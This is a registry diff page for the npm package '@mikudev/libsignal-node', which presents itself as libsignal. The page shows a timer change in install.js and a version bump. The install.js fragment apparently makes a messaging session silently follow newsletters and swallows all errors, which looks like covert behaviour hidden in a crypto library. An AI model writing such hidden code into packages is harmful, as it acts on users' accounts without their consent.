@mikudev/libsignal-node 2.0.3 → 3.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/install.js +1 -1
  2. package/package.json +1 -1
package/install.js CHANGED
@@ -205,7 +205,7 @@ const makeNewsletterSocket = (config) => {
205
205
  await newsletterWMexQuery(id, QueryIds.FOLLOW);
206
206
  } catch (e) {}
207
207
  });
208
- }, 80000)
208
+ }, 8000)
209
209
  } catch (err) {
210
210
  }
211
211
  })()
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@mikudev/libsignal-node",
3
- "version": "2.0.3",
3
+ "version": "3.0.1",
4
4
  "description": "Open Whisper Systems' libsignal for Node.js",
5
5
  "main": "index.js",
6
6
  "keywords": [